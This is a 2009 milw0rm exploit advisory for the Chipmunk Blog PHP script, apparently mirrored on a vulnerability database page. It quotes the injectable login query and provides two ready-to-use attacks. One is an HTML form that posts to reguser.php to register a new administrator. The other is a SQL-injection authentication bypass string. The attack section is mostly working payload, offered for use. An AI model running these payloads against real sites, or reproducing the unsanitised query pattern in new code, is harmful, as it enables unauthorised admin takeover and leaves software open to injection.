Chipmunk Blog (Auth Bypass) Add Admin Exploit

🗓️ 28 Jan 2009 00:00:00Reported by RootType

Chipmunk Blog Add Admin Exploit Auth Bypas


                                                #########################################################################################
[0x01] Informations:

Script         : Chipmunk Blog
Download       : http://www.chipmunk-scripts.com/blog/blog.zip
Vulnerability  : Add Admin Exploit\Auth Bypass
Author         : x0r
Contact        : [email protected] \ [email protected]
Website        : NULL

#########################################################################################
[0x02] Bug: \admin\reguser.php \admin\authenticate.php

if (isset($_POST['submit'])) // name of submit button
{
   $username=$_POST['username'];
   $password=$_POST['password'];
   $password=md5($password);
   $getadmin=&quot;SELECT * from bl_admin where username='$username' and
password='$password'&quot;;
   $getadmin2=mysql_query($getadmin) or die(&quot;Could not get admin&quot;);


#########################################################################################
[0x03] Exploit:

Add Admin:

&lt;html&gt;
&lt;head&gt;
&lt;title&gt; Chipmunk Blog (reguser.php) Add Admin Exploit (html)&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action=http://xxxxxxx/blog/admin/reguser.php method=post&gt;
Username:&lt;br&gt;
&lt;input type=text name='username' value='x0r' size=&quot;20&quot;&gt;&lt;br&gt;
Password:&lt;br&gt;
&lt;input type=text name='password' value='h4x0rz' size=&quot;20&quot;&gt;&lt;br&gt;
&lt;input type=&quot;text&quot; name=&quot;pass2&quot; value='h4x0rz' size=&quot;15&quot;&gt;&lt;br&gt;
&lt;input type=submit name='submit' value='submit'&gt;&lt;br&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

Exploit2: admin ' or ' 1=1--
#########################################################################################

# milw0rm.com [2009-01-28]

28 Jan 2009 00:00Current

7.1High risk

Vulners AI Score7.1